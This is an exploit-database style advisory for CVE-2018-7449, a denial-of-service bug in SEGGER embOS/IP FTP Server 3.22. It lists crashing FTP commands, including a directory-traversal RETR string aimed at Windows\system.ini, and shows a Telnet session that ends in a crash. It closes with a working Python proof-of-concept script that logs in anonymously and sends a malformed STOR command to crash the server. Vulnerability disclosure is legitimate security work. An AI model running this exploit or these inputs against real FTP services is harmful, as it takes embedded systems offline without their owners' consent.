SEGGER embOS/IP FTP Server 3.22 - Denial of Service Vulnerability

2018-03-05
ID: 96932
CVE: None
Download vulnerable application: None
[+] Credits: John Page (aka hyp3rlinx)      
    Vendor:
=============
www.segger.com
    Product:
===========
embOS/IP FTP Server v3.22
    Vulnerability Type:
===================
FTP Commands Denial Of Service
      CVE Reference:
==============
CVE-2018-7449
    Security Issue:
================
SEGGER embOS/IP FTP Server 3.22 allows remote attackers to cause a denial of service (daemon crash)
via an invalid LIST, STOR, or RETR command.
  STOR 666\r\n
LIST\r\n
RETR '+'..\\'*8+'Windows\system.ini\r\n
    TELNET x.x.x.x 21
  220 Welcome to embOS/IP FTP server
USER anonymous
331 Password required.
PASS anonymous
230 User logged in, proceed.
STOR Bye!
  CRASH!!!
      Exploit/POC:
=============
import socket,time
  VICTIM=raw_input('[+]Segger v3.22 FTP Server IP > ')
USR='anonymous'
PWD='anonymous'
CMD="STOR Bye!\r\n"
  s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((VICTIM, 21)) 
print s.recv(1024) # Recieve FTP Banner
time.sleep(1)
s.send("USER " + USR+ "\r\n") 
print s.recv(1024) 
time.sleep(1)
s.send("PASS "+ PWD+"\r\n") #
print s.recv(1024) 
time.sleep(1)
s.send(CMD)
print 'Sent %s' % CMD
s.close()
1-4-2 (www02)